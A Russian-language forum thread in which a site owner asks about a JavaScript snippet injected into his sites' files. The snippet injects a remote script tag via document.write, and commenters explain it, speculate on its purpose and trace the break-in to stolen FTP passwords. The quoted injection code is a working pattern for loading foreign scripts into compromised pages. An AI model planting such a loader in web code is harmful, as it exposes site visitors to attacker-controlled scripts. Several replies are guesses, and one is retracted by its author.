Внедрили странный кусок кода

Question

[monoteos]

Вот такой кусок кода был внедрен пару дней назад в моих два сайта, в основном в файлы js

/*b44d55*/ function srcc() { var ff = document.createElement('script'); ff.src = 'http://mail.ru'; if (!document.getElementById('ff')) { document.write('<div id=\'ff\'></div>'); document.getElementById('ff').appendChild(ff); } } srcc(); /*/b44d55*/

конечно я сменил пароли на ftp и mysql, может кто-то сталкивался?
Первый раз вижу такое чтобы на сайте в коде появились куски чужеродного кода

Answer 1

[Николай Васильчук]

Что делает код:

1. Создается скрипт с src=http://mail.ru
   

   var ff = document.createElement('script'); ff.src = 'http://mail.ru';
   

   
   
2. Добавляется div
   

   document.write('<div id=\'ff\'></div>'); 
   

   
   
3. В div добавляется скрипт
   

   document.getElementById('ff').appendChild(ff);
   

   
   

Так как нет никакого смысла добавлять скрипт с mail.ru, то предполагаю, что в hosts вам тоже добавили левые адреса, чтобы mail.ru отдавал нужный скрипт.

Comments

[rakot]

Сижу и думаю, чего это вы написали. Получается, что к сайту на каком хостинге получили доступ на уровне файлов, заинжектили js который тянет в общем случае html с сайта мейл ру, а если на клиентской машине другой вирус подменил hosts(причем так что мейл.ру просто не работает, т.к. на главной висит jsка), то все срабатывает как надо?

Более вероятно что автор вопроса просто затер «вредоносный» урл или это просто тестовая заглушка, которую еще не придумали как монетизировать.

[merlin-vrn]

как вариант — ddos mail.ru посредством браузеров клиентов заращённых сайтов

насчёт «мейлру просто не работает» — ну так на главной может быть логика, чтоб определить, как именно клиент попал на сайт — по вот такой хрени из джаваскрипта или же адрес в строке вбил

[Николай Васильчук]

Да, про hosts это я прогнал по полной. Заработался, извините.

[monoteos]

вредоносный код не вытирал, скопировал все как есть. Конечно очевидно что скрипт ничего плохого не делает, вопрос зачем?

[stalkerxxl]

Это «пока» ничего плохого не делает… Подозреваю, что потом будет или страницу подменять, или тулбар mail.ru ставить… Прибыльная эта тема сейчас… в Рунете… =)))

[Максим Пономарев]

monoteos Может это сам mail.ru себе счетчики накручивает?

[monoteos]

ребята, может это mail.ru-metrika?

Answer 2

[Олег]

Год назад работал в компании по созданию сайтов, также занимались хостингом. Как-то утром обнаружили, что порядка 100 сайтов заражены. Именно данной чертовщиной. Проверяйте все js, php, html файлы. Залезли через ftp

Comments

[Олег]

В общем, поясню что делает данная штука. В какой-то момент, открывая сайт, загружается не главная страница, а страница с какими-то баннерами. В нашем случае это были флэш банеры с какими-то электронными рулетками.

Answer 3

[lubezniy]

Думаю, кто-то из начинающих взломщиков тестил, а потом банально урл поменять забыл.
А в самом факте внедрения кода в файлы, увы, ничего удивительного нет. Следите постоянно за контентом и скриптами.

Answer 4

[rakot]

Ага ты им счетчики накручиваешь, а они тебе сертификат мейлвари подписать.

Comments

[rakot]

промазал, хотел к предыдущему ответу комент

Answer 5

[termin]

Столкнулся на днях с такой штукой. Причем вычистив все куски которые были изменены на сайте, на движке OpenCart, ситуация повторилась, и теперь сайт перестал отображаться вообще. Что интересно, изменился файл hosts практически в то время, как я пришел на работу, а сегодня я немного опоздал. Там ничего интересного нет, но и время изменения файлов на сайте было зафиксировано так-же после включения компьютера. Пока смотрю в сторону FileZilla, т.к. подозрительно были известны аккаунты от фтп и Антивирус Касперсого указал на уязвимость www.securelist.com/ru/advisories/54415/?function=advisories&VN=54415.

Comments

[monoteos]

После чистки компа от вирусов, нашелся вирус который ворует пароли, я думаю это в нем была проблема